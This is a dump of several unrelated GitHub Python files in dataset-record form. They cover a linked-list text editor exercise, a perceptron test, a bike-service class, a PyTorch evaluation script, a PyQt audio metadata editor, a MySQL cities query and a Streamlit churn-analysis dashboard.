insert,\n # the character is inserted and the following characters on that line are shifted down; in overwrite mode,\n # the character at the current position is replaced. If the cursor is currently at a newline character and the\n # entry mode is overwrite, the new character is inserted at the end of the line. The cursor is advanced one\n # position. If ch is the newline character, then a line break occurs, which is the same as calling break_line()\n def add_char(self, ch):\n if ch == '\\n':\n self.break_line()\n\n else:\n if self._insert_mode:\n self._current_line.text.insert(self._current_column_index, ch)\n\n elif self._current_line.text[self._current_column_index] == '\\n':\n self._current_line.text.insert(-1, ch)\n else:\n self._current_line.text[self._current_column_index] = ch\n\n self._current_column_index += 1\n\n # Removes the character at the current position and leaves the cursor at the same position\n def delete_char(self):\n self._current_line.text.pop(self._current_column_index)\n\n # Removes the character preceding the current position and moves the cursor left one position. 
If the cursor is\n # currently at the front of the line, the newline character on the preceding line is removed and the current line\n # and the preceding line are merged into a single line\n def robout_char(self):\n if self._current_column_index == 0 and self._current_line is not self._first_line:\n self._current_line.prev.text.pop(-1)\n self._current_column_index = len(self._current_line.prev.text) - 1\n self._current_line.prev.text.extend(self._current_line.text)\n\n self.delete_line()\n if self._current_line is not self._last_line:\n self.move_up(1)\n else:\n new_text = self._current_line.text[self._current_column_index:]\n self._current_line.text = new_text\n self._current_column_index = 0\n\n # Deletes the entire contents of the buffer and resets it to the same state as in the constructor\n def delete_all(self):\n self.__init__()\n\n # Show the entire contents of the buffer\n def show_all(self):\n current_line_temp = self._first_line\n loop_count = 0\n while current_line_temp is not None:\n if loop_count == self._current_line_index:\n print(self.get_line(True),end='')\n else:\n print(''.join(current_line_temp.text),end='')\n loop_count += 1\n current_line_temp = current_line_temp.next\n\n\nclass _EditBufferNode(object):\n def __init__(self, prev=None, text=None, next=None):\n self.prev = prev\n self.text = text\n self.next = next\n\n\ndef main():\n print(\"create a new EditBuffer\")\n edit_buffer = EditBuffer()\n print()\n print(\"show all: \")\n edit_buffer.show_all()\n print()\n\n string1 = \"def robout_char(self):\\n\"\n string2 = ' if self._current_column_index == 0 and self._current_line is not self._first_line:\\n'\n string3 = ' self._current_line.prev.text.pop(-1)\\n'\n string4 = ' self._current_column_index = len(self._current_line.prev.text) - 1\\n'\n string5 = ' self._current_line.prev.text.extend(self._current_line.text)\\n'\n string6 = '\\n'\n string7 = \" self.delete_line()\\n\"\n string8 = \" if self._current_line is not self._last_line:\\n\"\n string9 = \" self.move_up(1)\\n\"\n\n string_list = [string1, string2, string3, string4, string5, string6, string7, string8, string9]\n print(\"add characters to the edit buffer\")\n for string in string_list:\n # print(\"now adding the string: %s\" % string)\n for char in string:\n # print(\"now adding: %s\" % char)\n edit_buffer.add_char(char)\n\n print(\"show all: \")\n edit_buffer.show_all()\n print()\n\n print(\"move to the front of the first line and move 20 right:\")\n edit_buffer.move_doc_home()\n for _ in range(20):\n edit_buffer.move_right()\n\n edit_buffer.show_all()\n print()\n\n print(\"move down for 2\")\n edit_buffer.move_down(2)\n edit_buffer.show_all()\n print()\n\n\n print(\"number of lines: %d\" % edit_buffer.num_lines()) # Expected: 10\n print(\"number of characters: %d\" % edit_buffer.num_chars()) # Expected: 45 (44 characters + '\\n')\n print(\"line index: %d \" % edit_buffer.line_index()) # Expected: 2\n print(\"column index: %d\" % edit_buffer.column_index()) # Expected: 20\n print()\n\n print(\"get character of the current cursor: %s\" % edit_buffer.get_char())\n print()\n print(\"get line: %s \" % edit_buffer.get_line())\n\n print(\"move 10 right: \")\n for _ in range(10):\n edit_buffer.move_right()\n edit_buffer.show_all()\n print()\n \n print(\"move up for 100:\")\n edit_buffer.move_up(100)\n edit_buffer.show_all()\n print()\n \n print(\"move down by 2 and move right by 20 :\")\n edit_buffer.move_down(2)\n for _ in range(20):\n edit_buffer.move_right()\n edit_buffer.show_all()\n print()\n \n 
print(\"move down by 4:\")\n edit_buffer.move_down(4)\n edit_buffer.show_all()\n print()\n \n print(\"move to the end of the file:\")\n edit_buffer.move_doc_end()\n edit_buffer.show_all()\n print()\n \n print(\"move left:\")\n edit_buffer.move_left()\n edit_buffer.show_all()\n print()\n \n print(\"move right:\")\n edit_buffer.move_right()\n edit_buffer.show_all()\n print()\n \n print(\"move up by 2 and right by 16:\")\n edit_buffer.move_up(2)\n for _ in range(16):\n edit_buffer.move_right()\n edit_buffer.show_all()\n print()\n \n print(\"move line home: \")\n edit_buffer.move_line_home()\n edit_buffer.show_all()\n print()\n \n print(\"move line end: \")\n edit_buffer.move_line_end()\n edit_buffer.show_all()\n print() \n \n print(\"break line: \")\n edit_buffer.break_line()\n edit_buffer.show_all()\n print()\n\n print(\"delete line:\")\n edit_buffer.delete_line()\n edit_buffer.show_all()\n print()\n\n print(\"move up by 6\")\n edit_buffer.move_up(6)\n edit_buffer.show_all()\n print()\n\n print(\"delete line:\")\n edit_buffer.delete_line()\n edit_buffer.show_all()\n print()\n\n print(\"move right by 30\")\n for _ in range(30):\n edit_buffer.move_right()\n edit_buffer.show_all()\n print()\n\n print(\"truncate line: \")\n edit_buffer.truncate_line()\n edit_buffer.show_all()\n print()\n\n print(\"move to line home: \")\n edit_buffer.move_line_home()\n edit_buffer.show_all()\n print()\n\n print(\"rubout char:\")\n edit_buffer.robout_char()\n edit_buffer.show_all()\n print()\n\n print(\"move right by 30\")\n for _ in range(30):\n edit_buffer.move_right()\n edit_buffer.show_all()\n print()\n\n print(\"rubout char: \")\n edit_buffer.robout_char()\n edit_buffer.show_all()\n print()\n\n print(\"delete all\")\n edit_buffer.delete_all()\n edit_buffer.show_all()\n print()\n \n\nif __name__ == \"__main__\":\n main()\n","repo_name":"yuhanliu0121/learnDataStructure","sub_path":"Chapter9_Advanced_linked_Lists/3_TextEditor.py","file_name":"3_TextEditor.py","file_ext":"py","file_size_in_byte":14961,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"6520515517","text":"import unittest\nimport sklearn\nfrom perceptron_class import Perceptron\nimport numpy as np\n\n\nclass TestPerceptron(unittest.TestCase):\n\n def setUp(self):\n self.num_inputs_nodes = 10\n self.num_neurons = 10\n self.pnn = Perceptron(self.num_inputs_nodes, self.num_neurons)\n\n def test__init__(self):\n num_of_inputs_plus_bias = self.num_inputs_nodes + 1\n self.assertTrue(self.pnn.weights.shape[0], num_of_inputs_plus_bias)\n self.assertTrue(self.pnn.weights.shape[1], self.num_neurons)\n self.assertEqual(self.pnn.weights.size, num_of_inputs_plus_bias * self.num_neurons)\n\n def test_train(self):\n self.num_inputs_nodes = 2\n self.num_neurons = 1\n self.pnn = Perceptron(self.num_inputs_nodes, self.num_neurons)\n\n x = np.array([[0, 0], [0, 1], [1, 0], [1, 1]])\n # XORtargets = np.array([[0], [1], [1], [0]])\n targets = {'And data': np.array([[0], [0], [0], [1]]),\n 'Or data': np.array([[0], [1], [1], [1]])}\n self.assertTrue(targets['And data'].shape == self.pnn.predict(x).shape)\n\n for key, y in targets.items():\n self.pnn.train(x, y, 0.2, 200)\n preds = self.pnn.predict(x)\n self.assertTrue(np.array_equal(preds, y), msg=\"given {} not equals to the right answer: {}\".format(\n preds, y\n ))\n\nif __name__ == '__main__':\n 
unittest.main()","repo_name":"gazon1/nn","sub_path":"perceptron/perceptron.py","file_name":"perceptron.py","file_ext":"py","file_size_in_byte":1415,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"8202088230","text":"from src.component import (Bell, Brakes, Chain, Tyres)\n\n\nclass ServicePerson:\n def __init__(self, bike):\n self.current_bike = bike\n\n\n def order_parts(self):\n fresh_parts = {\n 'bell': Bell(0, 10),\n 'brakes': Brakes(0, 20),\n 'chain': Chain(0, 30),\n 'tyres': Tyres(0, 40)\n }\n\n for key, component in self.current_bike.components.items():\n if component.check_condition() == 'Broken':\n self.current_bike.components[key] = fresh_parts[key]\n\n\n def service_parts(self):\n for component in self.current_bike.components.values():\n if component.check_condition() in ['Fragile', 'Poor']:\n component.set_current_state('Good')\n\n\n def oil(self):\n for key, component in self.current_bike.components.items():\n if component.check_condition() == 'Good' and key.capitalize() in ['Chain', 'Bell', 'Brakes']:\n component.set_current_state('Pristine')\n\n\n def pump_wheels(self):\n tyres = self.current_bike.components['tyres']\n\n if tyres.check_condition() == 'Good':\n tyres.set_current_state('Pristine')\n\n\n def service_bike(self):\n self.service_parts()\n self.oil()\n self.pump_wheels()\n\n\n def check_safety(self):\n if self.current_bike.ring_bell() == 'The bell fell off!':\n return False\n\n return self.current_bike.components['brakes'].check_condition() in ['Good', 'Pristine']\n\n\n def check_up(self):\n self.order_parts()\n self.service_bike()\n\n if self.check_safety():\n return self.current_bike.ring_bell()\n\n return 'there has been an error'\n","repo_name":"gheenie/py-bike-shop","sub_path":"src/service_person.py","file_name":"service_person.py","file_ext":"py","file_size_in_byte":1708,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"43974133256","text":"import torch\nimport nets\nfrom dataloader import testloader\nfrom sklearn.metrics import classification_report, confusion_matrix\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport os\n\n\ndef evaluate(model, test_loader, model_name='weights.pt'):\n use_gpu = torch.cuda.is_available()\n if use_gpu:\n print('Evaluate Using CUDA')\n\n path = '../drive/My Drive/Colab Notebooks/' + model_name\n writer = SummaryWriter(comment='--{}--evaluate'.format(model_name))\n \n model.load_state_dict(torch.load(path))\n model.eval()\n\n if use_gpu:\n model.cuda()\n\n correct = 0\n total = 0\n with torch.no_grad():\n for inputs, labels in test_loader:\n inputs = inputs.cuda()\n labels = labels.cuda()\n\n outputs = model(inputs)\n _, predicted = torch.max(outputs.data, 1)\n total += labels.size(0)\n correct += (predicted == labels.data).sum().item()\n print('Accuracy:', 100 * correct / total)\n writer.add_scalar('Accuracy', 100 * correct / total, 1)\n\n\ndef get_prediction(model, test_loader, model_name='weights.pt'):\n use_gpu = torch.cuda.is_available()\n if use_gpu:\n print('Using CUDA')\n device = 'cuda:0' if use_gpu else 'cpu'\n\n path_ = '../drive/My Drive/Colab Notebooks/weights/' + model_name\n if not os.path.exists(path_):\n print('alo')\n path_ = 'weights/' + model_name\n \n model.load_state_dict(torch.load(path_))\n model.eval()\n\n if use_gpu:\n model.cuda()\n\n preds_ = torch.tensor([], dtype=torch.int64, device=device)\n labels_ = torch.tensor([], dtype=torch.int64, 
device=device)\n with torch.no_grad():\n for inputs, labels in test_loader:\n inputs = inputs.to(device)\n labels = labels.to(device)\n\n outputs = model(inputs)\n _, predicted = torch.max(outputs.data, 1)\n preds_ = torch.cat((preds_, predicted), dim=0)\n labels_ = torch.cat((labels_, labels), dim=0)\n\n preds_ = preds_.cpu()\n labels_ = labels_.cpu()\n return preds_, labels_\n\n\nif __name__ == '__main__':\n # net = nets.VGG16(pretrained=False)\n # net = nets.VGG16_BN(pretrained=True)\n # net = nets.ResNet50(pretrained=False)\n # net = nets.ResNet50_Normal(pretrained=False)\n # net = nets.MobileNetV2(pretrained=False)\n net = nets.MobileNetV2_Normal(pretrained=False)\n \n test_loader = testloader(colab=True)\n # evaluate(net, test_loader, model_name='vgg16_bn_pretrained_augmented_96batch.pt')\n pred, truth = get_prediction(net, test_loader, model_name='vgg16_bn_pretrained_augmented_96batch.pt')\n \n target_names = ['bulbasaur', 'charmander', 'jigglypuff', 'magikarp', 'mudkip', 'pikachu', 'psyduck', 'snorlax', 'squirtle']\n report = classification_report(truth, pred, target_names=target_names)\n print(report)\n matrix = confusion_matrix(truth, pred)\n df = pd.DataFrame(matrix, index = [i for i in target_names], columns = [i for i in target_names])\n fig = plt.figure(figsize = (10,7))\n sns.heatmap(df, annot=True, cbar=False, cmap=\"YlGnBu\")\n plt.savefig('matrix')\n ","repo_name":"blueyellowpink/pokemon-trainer","sub_path":"evaluate.py","file_name":"evaluate.py","file_ext":"py","file_size_in_byte":3144,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"25240704251","text":"\nfrom json import JSONDecodeError\nimport PyQt5\nfrom PyQt5.QtWidgets import (\n QApplication, QDialog, QMainWindow, QMessageBox, QFileDialog, QProxyStyle, QTabBar, QStyle\n)\nimport PyQt5.QtWidgets as pqw\nfrom gui import mainWindow\nimport audiotypes\n\n\nclass Application(QMainWindow, mainWindow.Ui_MainWindow):\n def __init__(self, parent=None):\n super().__init__(parent)\n self.setupUi(self)\n \n # Maps the object names of the fields to the instantiated label \n # objects so that we can set the label text to bold dynamically.\n # PyQT5's buddy system could also achieve a similar effect, \n # but since you can only attach one buddy to each field label pair,\n # the Disk and Track number fields will not work correctly \n # unless we do it in a different way.\n self.labelFieldMappingDictionary = {\n \"TrackNumberCurrentField\": self.TrackNumberLabel,\n \"TrackNumberMaximumField\": self.TrackNumberLabel,\n \"DiskNumberCurrentField\": self.DiskNumberLabel,\n \"DiskNumberMaximumField\": self.DiskNumberLabel,\n \"TitleField\": self.TitleLabel,\n \"ArtistField\": self.ArtistLabel,\n \"AlbumField\": self.AlbumLabel,\n \"DateField\": self.DateLabel,\n \"GenreField\": self.GenreLabel,\n \"ComposerField\": self.ComposerLabel,\n \"URLField\": self.URLLabel,\n \"ReplayGainField\": self.ReplayGainLabel,\n # \"CommentField\": self.CommentLabel,\n # \"DescriptionField\": self.DescriptionLabel\n }\n self.fieldChangedDictionary = {}\n self.isFileReading = False\n\n self.actionOpenFolder.triggered.connect(self.openFileDialog)\n self.actionSave.triggered.connect(self.saveMetadata)\n\n self.TrackNumberCurrentField.valueChanged.connect(self.trackEdited)\n self.TrackNumberMaximumField.valueChanged.connect(self.trackEdited)\n self.DiskNumberCurrentField.valueChanged.connect(self.trackEdited)\n self.DiskNumberMaximumField.valueChanged.connect(self.trackEdited)\n 
self.TitleField.textEdited.connect(self.trackEdited)\n self.ArtistField.textEdited.connect(self.trackEdited)\n self.AlbumField.textEdited.connect(self.trackEdited)\n self.DateField.textEdited.connect(self.trackEdited)\n self.GenreField.textEdited.connect(self.trackEdited)\n self.ComposerField.textEdited.connect(self.trackEdited)\n self.URLField.textEdited.connect(self.trackEdited)\n self.ReplayGainField.valueChanged.connect(self.trackEdited)\n self.CommentField.textChanged.connect(self.trackEdited)\n self.DescriptionField.textChanged.connect(self.trackEdited)\n\n def openFileDialog(self):\n options = QFileDialog.Options()\n fileName = QFileDialog.getExistingDirectory(self,\"QFileDialog.getOpenFileName()\", \"\", options=options)\n if fileName:\n print(fileName)\n\n model = pqw.QFileSystemModel()\n model.setRootPath(fileName)\n \n\n #model.setFilter()\n #iter = PyQt5.QDirIterator(self.path, QDirIterator.Subdirectories)\n #print(model.data())\n \n model.setNameFilters([\"*.flac\", \"*.opus\", \"*.m4a\", \"*.mp4\", \"*.mp3\"])\n #model.setNameFilterDisables(False)\n\n\n \n self.treeView.setModel(model)\n for i in range(1, self.treeView.model().columnCount()):\n self.treeView.header().hideSection(i)\n self.treeView.setRootIndex(model.index(fileName))\n\n\n self.treeView.selectionModel().selectionChanged.connect(self.itemSelected)\n \n\n def itemSelected(self, selected, deselected):\n fullSelection = self.treeView.selectionModel().selectedIndexes()\n #print(fullSelection)\n if len(fullSelection) > 0:\n model = fullSelection[0].model()\n #print(model.isDir(fullSelection[0]))\n for selection in reversed(fullSelection):\n if not model.isDir(selection):\n self.isFileReading = True\n file = audiotypes.createFileObject(model.filePath(selection))\n\n self.TrackNumberCurrentField.setValue(file.getTrackNumberCurrent())\n self.TrackNumberMaximumField.setValue(file.getTrackNumberMaximum())\n self.DiskNumberCurrentField.setValue(file.getDiskNumberCurrent())\n self.DiskNumberMaximumField.setValue(file.getDiskNumberMaximum())\n\n self.TitleField.setText(file.getTitle())\n self.ArtistField.setText(file.getArtist())\n self.AlbumField.setText(file.getAlbum())\n self.DateField.setText(file.getDate())\n self.GenreField.setText(file.getGenre())\n self.ComposerField.setText(file.getComposer())\n self.URLField.setText(file.getURL())\n self.ReplayGainField.setValue(file.getReplayGain())\n\n self.CommentField.setPlainText(file.getComment())\n self.DescriptionField.setPlainText(file.getDescription())\n # Not listening for changes with trackEdited because this field should be immutable.\n self.RawMetadataField.setPlainText(file.getAllFileMetadata())\n break\n #print(filePath)\n #selected[0].setFlags()\n\n # To stop the unblockable signals from firing and affecting the list of changes the user makes\n self.isFileReading = False\n self.fieldChangedDictionary.clear()\n self.clearCSS()\n\n\n def trackEdited(self):\n if not self.isFileReading:\n fieldName = self.sender().objectName()\n self.labelFieldMappingDictionary[fieldName].setStyleSheet(\"font-weight: bold\")\n self.fieldChangedDictionary[fieldName] = True\n print(self.fieldChangedDictionary)\n\n def saveMetadata(self):\n fullSelection = self.treeView.selectionModel().selectedIndexes()\n songSelectionsOnly = []\n if len(fullSelection) > 0:\n model = fullSelection[0].model()\n for selection in fullSelection:\n if not model.isDir(selection):\n songSelectionsOnly.append(selection)\n if len(songSelectionsOnly) > 0:\n for selection in songSelectionsOnly:\n file = 
audiotypes.createFileObject(model.filePath(selection))\n for field, value in self.fieldChangedDictionary.items():\n if field == \"TrackNumberCurrentField\":\n file.setTrackNumberCurrent(self.TrackNumberCurrentField.value())\n if field == \"TrackNumberMaximumField\":\n file.setTrackNumberMaximum(self.TrackNumberMaximumField.value())\n if field == \"DiskNumberCurrentField\":\n file.setDiskNumberCurrent(self.DiskNumberCurrentField.value())\n if field == \"DiskNumberMaximumField\":\n file.setDiskNumberMaximum(self.DiskNumberMaximumField.value())\n if field == \"TitleField\":\n file.setTitle(self.TitleField.text())\n if field == \"ArtistField\":\n file.setArtist(self.ArtistField.text())\n if field == \"AlbumField\":\n file.setAlbum(self.AlbumField.text())\n if field == \"DateField\":\n file.setDate(self.DateField.text())\n if field == \"GenreField\":\n file.setGenre(self.GenreField.text())\n if field == \"ComposerField\":\n file.setComposer(self.ComposerField.text())\n if field == \"URLField\":\n file.setURL(self.URLField.text())\n if field == \"ReplayGainField\":\n file.setReplayGain(self.ReplayGainField.value())\n if field == \"CommentField\":\n file.setComment(self.CommentField.toPlainText())\n if field == \"DescriptionField\":\n file.setDescription(self.DescriptionField.toPlainText())\n file.saveMetadata()\n self.fieldChangedDictionary.clear()\n self.clearCSS()\n\n def clearCSS(self):\n for key, value in self.labelFieldMappingDictionary.items():\n value.setStyleSheet(\"font-weight: normal\")","repo_name":"lukefankhanel/music-metadata-editor","sub_path":"src/gui/application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":8634,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"15215800631","text":"#!/usr/bin/python3\n'''\nThis module is a basic interaction with\na MYSQL DB\n'''\n\nimport MySQLdb\nimport sys\n\nif __name__ == \"__main__\":\n SQLdbConnection = MySQLdb.connect(host=\"localhost\",\n port=3306,\n user=sys.argv[1],\n passwd=sys.argv[2],\n db=sys.argv[3])\n dbCurser = SQLdbConnection.cursor()\n dbCurser.execute(f'''\n SELECT cities.id, cities.name, states.name\n FROM cities INNER JOIN states\n ON cities.state_id=states.id\n ORDER BY cities.id ASC\n ''')\n query_rows = dbCurser.fetchall()\n for row in query_rows:\n print(row)\n dbCurser.close()\n SQLdbConnection.close()\n","repo_name":"Matthew-brinkmann/holbertonschool-higher_level_programming","sub_path":"0x0F-python-object_relational_mapping/4-cities_by_state.py","file_name":"4-cities_by_state.py","file_ext":"py","file_size_in_byte":844,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"33992858598","text":"import streamlit as st\r\nimport pandas as pd\r\nimport numpy as np\r\nimport seaborn as sns\r\nimport matplotlib.pyplot as plt\r\nimport plotly.express as px\r\nfrom PIL import Image\r\n\r\n\r\nst.set_page_config(\r\n page_title = 'Churn Prediction - EDA',\r\n layout = 'wide')\r\n\r\ndef run():\r\n # Plot title\r\n st.title('Churn Customer Prediction')\r\n \r\n # Plot sub-header\r\n st.subheader('Exploratory Data Analysis Churn Dataset')\r\n \r\n # Add Image\r\n image = Image.open('churn.jpg')\r\n st.image(image)\r\n \r\n # Add description\r\n st.write('# Introduction')\r\n st.write('Name : Muhammad Farhan Darmawan')\r\n st.write('Batch : RMT 019')\r\n st.markdown('---')\r\n \r\n '''\r\n Dataset Description :\r\n\r\n | Column | Description |\r\n | --- | --- |\r\n | user_id\t| ID of a 
customer |\r\n | age\t| Age of a customer |\r\n | gender\t| Gender of a customer |\r\n | region_category\t| Region that a customer belongs to |\r\n | membership_category\t| Category of the membership that a customer is using |\r\n | joining_date | Date when a customer became a member |\r\n | joined_through_referral\t| Whether a customer joined using any referral code or ID |\r\n | preferred_offer_types | Type of offer that a customer prefers |\r\n | medium_of_operation\t| Medium of operation that a customer uses for transactions |\r\n | internet_option\t| Type of internet service a customer uses |\r\n | last_visit_time\t| The last time a customer visited the website |\r\n | days_since_last_login\t| Number of days since a customer last logged into the website |\r\n | avg_time_spent\t| Average time spent by a customer on the website |\r\n | avg_transaction_value\t| Average transaction value of a customer |\r\n | avg_frequency_login_days\t| Number of times a customer has logged in to the website |\r\n | points_in_wallet\t| Points awarded to a customer on each transaction |\r\n | used_special_discount\t| Whether a customer uses special discounts offered |\r\n | offer_application_preference\t| Whether a customer prefers offers |\r\n | past_complaint\t| Whether a customer has raised any complaints |\r\n | complaint_status\t| Whether the complaints raised by a customer was resolved |\r\n | feedback\t| Feedback provided by a customer |\r\n | churn_risk_score\t| Churn score (0 : Not churn, 1 : Churn) |\r\n '''\r\n st.write('# Dataset of Churn')\r\n #show dataframe\r\n data = pd.read_csv('churn.csv')\r\n st.dataframe(data)\r\n \r\n # data cleaning\r\n # drop column\r\n data = data.drop(['user_id'], axis=1)\r\n # change type to datetime\r\n data['joining_date'] = pd.to_datetime(data['joining_date'])\r\n data['last_visit_time'] = pd.to_datetime(data['last_visit_time'])\r\n # extract year\r\n data['joining_date_year'] = data['joining_date'].dt.year\r\n data['last_visit_year'] = data['last_visit_time'].dt.year\r\n # splitting data\r\n num_cols = data.select_dtypes(include=np.number).columns.tolist()\r\n cat_cols = data.select_dtypes(include=['object']).columns.tolist()\r\n st.markdown('---')\r\n \r\n st.write('# Histogram Graph By Churn')\r\n # Show age graph\r\n x1 = list(data[data['churn_risk_score'] == 1]['age'])\r\n x2 = list(data[data['churn_risk_score'] == 0]['age'])\r\n\r\n fig = plt.figure(figsize=(12,4))\r\n sns.set_context('notebook', font_scale=1.2)\r\n #sns.set_color_codes(\"pastel\")\r\n plt.hist([x1, x2], bins = 40, density=False, color=['steelblue', 'lightblue'])\r\n plt.xlim([10,65])\r\n plt.legend(['Yes', 'No'], title = 'churn_risk_score', loc='upper right', facecolor='white')\r\n plt.xlabel('Age')\r\n plt.ylabel('Frequency')\r\n plt.title('Age Histogram By Churn', size=15)\r\n plt.box(False)\r\n plt.savefig('ImageName', format='png', dpi=200, transparent=True)\r\n st.pyplot(fig)\r\n\r\n # Show days last login graph\r\n x1 = list(data[data['churn_risk_score'] == 1]['days_since_last_login'])\r\n x2 = list(data[data['churn_risk_score'] == 0]['days_since_last_login'])\r\n\r\n fig = plt.figure(figsize=(12,4))\r\n sns.set_context('notebook', font_scale=1.2)\r\n #sns.set_color_codes(\"pastel\")\r\n plt.hist([x1, x2], bins = 40, density=False, color=['steelblue', 'lightblue'])\r\n plt.xlim([0,100])\r\n plt.legend(['Yes', 'No'], title = 'churn_risk_score', loc='upper right', facecolor='white')\r\n plt.xlabel('Days Last Login')\r\n plt.ylabel('Frequency')\r\n plt.title('Days Last Login 
Histogram By Churn', size=15)\r\n plt.box(False)\r\n plt.savefig('ImageName', format='png', dpi=200, transparent=True)\r\n st.pyplot(fig)\r\n \r\n # Show average time spent graph\r\n x1 = list(data[data['churn_risk_score'] == 1]['avg_time_spent'])\r\n x2 = list(data[data['churn_risk_score'] == 0]['avg_time_spent'])\r\n\r\n fig = plt.figure(figsize=(12,4))\r\n sns.set_context('notebook', font_scale=1.2)\r\n #sns.set_color_codes(\"pastel\")\r\n plt.hist([x1, x2], bins = 40, density=False, color=['steelblue', 'lightblue'])\r\n plt.xlim([0,4000])\r\n plt.legend(['Yes', 'No'], title = 'churn_risk_score', loc='upper right', facecolor='white')\r\n plt.xlabel('Average Time Spent')\r\n plt.ylabel('Frequency')\r\n plt.title('Average Time Spent Histogram By Churn', size=15)\r\n plt.box(False)\r\n plt.savefig('ImageName', format='png', dpi=200, transparent=True)\r\n st.pyplot(fig)\r\n \r\n # Show average transaction value graph\r\n x1 = list(data[data['churn_risk_score'] == 1]['avg_transaction_value'])\r\n x2 = list(data[data['churn_risk_score'] == 0]['avg_transaction_value'])\r\n\r\n fig = plt.figure(figsize=(12,4))\r\n sns.set_context('notebook', font_scale=1.2)\r\n #sns.set_color_codes(\"pastel\")\r\n plt.hist([x1, x2], bins = 40, density=False, color=['steelblue', 'lightblue'])\r\n plt.xlim([0,100000])\r\n plt.legend(['Yes', 'No'], title = 'churn_risk_score', loc='upper right', facecolor='white')\r\n plt.xlabel('Average Transaction Value')\r\n plt.ylabel('Frequency')\r\n plt.title('Average Transaction Value Histogram By Churn', size=15)\r\n plt.box(False)\r\n plt.savefig('ImageName', format='png', dpi=200, transparent=True)\r\n st.pyplot(fig)\r\n \r\n # Show average frequency login days graph\r\n x1 = list(data[data['churn_risk_score'] == 1]['avg_frequency_login_days'])\r\n x2 = list(data[data['churn_risk_score'] == 0]['avg_frequency_login_days'])\r\n\r\n fig = plt.figure(figsize=(12,4))\r\n sns.set_context('notebook', font_scale=1.2)\r\n #sns.set_color_codes(\"pastel\")\r\n plt.hist([x1, x2], bins = 40, density=False, color=['steelblue', 'lightblue'])\r\n plt.xlim([0,75])\r\n plt.legend(['Yes', 'No'], title = 'churn_risk_score', loc='upper right', facecolor='white')\r\n plt.xlabel('Average Frequency Login Days')\r\n plt.ylabel('Frequency')\r\n plt.title('Average Frequency Login Days Histogram By Churn', size=15)\r\n plt.box(False)\r\n plt.savefig('ImageName', format='png', dpi=200, transparent=True)\r\n st.pyplot(fig)\r\n \r\n # Show points in wallet graph\r\n x1 = list(data[data['churn_risk_score'] == 1]['points_in_wallet'])\r\n x2 = list(data[data['churn_risk_score'] == 0]['points_in_wallet'])\r\n\r\n fig = plt.figure(figsize=(12,4))\r\n sns.set_context('notebook', font_scale=1.2)\r\n #sns.set_color_codes(\"pastel\")\r\n plt.hist([x1, x2], bins = 40, density=False, color=['steelblue', 'lightblue'])\r\n plt.xlim([0,2500])\r\n plt.legend(['Yes', 'No'], title = 'churn_risk_score', loc='upper right', facecolor='white')\r\n plt.xlabel('Points in Wallet')\r\n plt.ylabel('Frequency')\r\n plt.title('Points in Wallet Histogram By Churn', size=15)\r\n plt.box(False)\r\n plt.savefig('ImageName', format='png', dpi=200, transparent=True)\r\n st.pyplot(fig)\r\n \r\n # Show joining date graph\r\n x1 = list(data[data['churn_risk_score'] == 1]['joining_date_year'])\r\n x2 = list(data[data['churn_risk_score'] == 0]['joining_date_year'])\r\n\r\n fig = plt.figure(figsize=(12,4))\r\n sns.set_context('notebook', font_scale=1.2)\r\n #sns.set_color_codes(\"pastel\")\r\n plt.hist([x1, x2], bins = 20, 
density=False, color=['steelblue', 'lightblue'])\r\n    plt.xlim([2015,2017])\r\n    plt.legend(['Yes', 'No'], title = 'churn_risk_score', loc='upper right', facecolor='white')\r\n    plt.xlabel('Joining Date')\r\n    plt.ylabel('Frequency')\r\n    plt.title('Joining Date Histogram By Churn', size=15)\r\n    plt.box(False)\r\n    plt.xticks([2015, 2016, 2017, 2018])\r\n    plt.savefig('ImageName', format='png', dpi=200, transparent=True)\r\n    st.pyplot(fig)\r\n    \r\n    # Show last visit graph\r\n    x1 = list(data[data['churn_risk_score'] == 1]['last_visit_year'])\r\n    x2 = list(data[data['churn_risk_score'] == 0]['last_visit_year'])\r\n\r\n    fig = plt.figure(figsize=(12,4))\r\n    sns.set_context('notebook', font_scale=1.2)\r\n    #sns.set_color_codes(\"pastel\")\r\n    plt.hist([x1, x2], bins = 20, density=False, color=['steelblue', 'lightblue'])\r\n    plt.xlim([2022,2024])\r\n    plt.legend(['Yes', 'No'], title = 'churn_risk_score', loc='upper right', facecolor='white')\r\n    plt.xlabel('Last Visit')\r\n    plt.ylabel('Frequency')\r\n    plt.title('Last Visit Histogram By Churn', size=15)\r\n    plt.box(False)\r\n    plt.xticks([2022, 2023, 2024])\r\n    plt.savefig('ImageName', format='png', dpi=200, transparent=True)\r\n    st.pyplot(fig)\r\n    st.markdown('---')\r\n    \r\n    st.write('# Countplot Graph By Churn')\r\n    # List of column names\r\n    cols = ['gender', 'region_category', 'membership_category',\r\n       'joined_through_referral', 'preferred_offer_types',\r\n       'medium_of_operation', 'internet_option',\r\n       'used_special_discount', 'offer_application_preference',\r\n       'past_complaint', 'complaint_status', 'feedback', 'churn_risk_score']\r\n\r\n    # Create the subplot grid\r\n    f, axes = plt.subplots(7, 2, figsize=(40, 50), facecolor='white')\r\n    f.suptitle('Data Frequency By Churn')\r\n\r\n    # Loop over the columns\r\n    for i, column in enumerate(cols):\r\n        row = i // 2  # Subplot row index\r\n        col = i % 2   # Subplot column index\r\n        \r\n        # Draw the countplot\r\n        ax = sns.countplot(x=column, hue='churn_risk_score', data=data[cols], palette='Blues', ax=axes[row, col])\r\n        ax.set_title(column)\r\n        ax.legend(title='churn_risk_score', loc='upper right')\r\n\r\n    # Display the plot\r\n    plt.tight_layout()\r\n    plt.show()\r\n    st.pyplot(f)\r\n    st.markdown('---')\r\n    
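\r\n    # Note on the grid indexing above (illustration added here, not part\r\n    # of the original script): enumerate order maps i -> (row, col) as\r\n    # 0 -> (0,0), 1 -> (0,1), 2 -> (1,0), ..., 13 -> (6,1); the same pair\r\n    # could be computed with row, col = divmod(i, 2).\r\n    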
